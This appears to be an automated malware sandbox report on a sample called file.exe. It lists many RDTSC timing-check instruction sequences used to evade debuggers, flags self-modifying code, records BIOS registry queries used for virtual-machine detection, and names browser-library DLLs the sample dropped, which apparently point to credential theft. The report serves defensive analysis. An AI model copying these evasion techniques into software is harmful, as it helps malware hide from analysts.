Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5BE8 second address: 7E5BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5BF9 second address: 7E5C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEFB8B6DE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E5C03 second address: 7E5C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E626E second address: 7E627C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB8B6DE5Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E627C second address: 7E6282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E640C second address: 7E6451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB8B6DE62h 0x00000009 popad 0x0000000a jmp 00007FEFB8B6DE5Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 jc 00007FEFB8B6DE56h 0x00000019 pop ecx 0x0000001a jmp 00007FEFB8B6DE66h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E6451 second address: 7E6459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E663B second address: 7E6647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FEFB8B6DE56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F165D second address: 7F169E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B69h 0x00000007 jmp 00007FEFB9679B5Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jg 00007FEFB9679B56h 0x00000017 jmp 00007FEFB9679B5Ch 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F169E second address: 7F16D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FEFB8B6DE66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jl 00007FEFB8B6DE62h 0x00000013 jmp 00007FEFB8B6DE5Ah 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jo 00007FEFB8B6DE5Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F16D9 second address: 7F16E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F16E2 second address: 7F16EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F131C second address: 7F132C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FEFB9679B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FFF6F second address: 7FFF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FFF73 second address: 7FFF7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FFF7D second address: 7FFF83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FF971 second address: 7FF984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FF984 second address: 7FF988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FFB52 second address: 7FFB61 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEFB9679B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804183 second address: 804191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEFB8B6DE56h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804191 second address: 80419D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEFB9679B56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 803CF6 second address: 803D02 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEFB8B6DE56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81039B second address: 8103AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FEFB9679B5Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8103AA second address: 8103B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8103B2 second address: 8103BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8103BF second address: 8103C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81B235 second address: 81B23B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81B23B second address: 81B276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FEFB8B6DE5Eh 0x0000000a ja 00007FEFB8B6DE56h 0x00000010 popad 0x00000011 jns 00007FEFB8B6DE62h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jbe 00007FEFB8B6DE66h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push edi 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819D2D second address: 819D35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819E80 second address: 819E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FEFB8B6DE62h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819E9C second address: 819EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819EA2 second address: 819EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819EA6 second address: 819EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 819EAA second address: 819EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81A1C1 second address: 81A1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81A1C5 second address: 81A1C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81A1C9 second address: 81A1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEFB9679B65h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81AF3A second address: 81AF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEFB8B6DE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F121 second address: 81F125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F125 second address: 81F129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82E692 second address: 82E6A4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEFB9679B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FEFB9679B58h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82E6A4 second address: 82E6C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEFB8B6DE63h 0x00000009 ja 00007FEFB8B6DE56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 828FAE second address: 828FCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FEFB9679B62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83BA9A second address: 83BAAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83F62F second address: 83F637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83F637 second address: 83F63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83F63B second address: 83F656 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007FEFB9679B62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83F656 second address: 83F668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEFB8B6DE56h 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FEFB8B6DE56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83F668 second address: 83F682 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEFB9679B56h 0x00000008 jns 00007FEFB9679B56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FEFB9679B56h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84D765 second address: 84D76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84D76B second address: 84D77A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FEFB9679B56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84D77A second address: 84D79F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEFB8B6DE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEFB8B6DE67h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84D79F second address: 84D7A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84D7A5 second address: 84D7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FEFB8B6DE56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DC35 second address: 84DC49 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEFB9679B56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FEFB9679B56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DEF1 second address: 84DF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007FEFB8B6DE56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DF00 second address: 84DF2D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEFB9679B56h 0x00000008 jc 00007FEFB9679B56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FEFB9679B5Ch 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jne 00007FEFB9679B56h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84DF2D second address: 84DF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8522E8 second address: 85230B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEFB9679B62h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007FEFB9679B56h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8525AA second address: 8525AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8525AE second address: 8525B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 852693 second address: 8526F8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEFB8B6DE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FEFB8B6DE66h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FEFB8B6DE58h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007FEFB8B6DE5Bh 0x00000031 push 00000004h 0x00000033 or dl, FFFFFFDEh 0x00000036 push 31062992h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push edx 0x0000003f pop edx 0x00000040 jnp 00007FEFB8B6DE56h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8526F8 second address: 8526FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8526FE second address: 852702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 854427 second address: 85442E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85442E second address: 854437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 854437 second address: 85443B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85443B second address: 85443F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85443F second address: 854445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 854012 second address: 854016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 855F3B second address: 855F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 855F44 second address: 855F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEFB8B6DE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 855F4E second address: 855F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E6039D second address: 4E603A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E603A1 second address: 4E603B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E603B5 second address: 4E603BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E603BB second address: 4E603D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEFB9679B60h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E603D8 second address: 4E603E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7761DD second address: 7761E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7761E3 second address: 7761F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007FEFB8B6DE5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776576 second address: 77657B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77657B second address: 776581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 776581 second address: 77658D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60A4C second address: 4E60A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60A50 second address: 4E60A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60A56 second address: 4E60A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60A5C second address: 4E60A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60A60 second address: 4E60A64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E60A64 second address: 4E60AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FEFB9679B68h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov al, F2h 0x00000015 movsx edx, si 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FEFB9679B61h 0x00000021 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 76A0C4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7925C4 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00374910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00374910
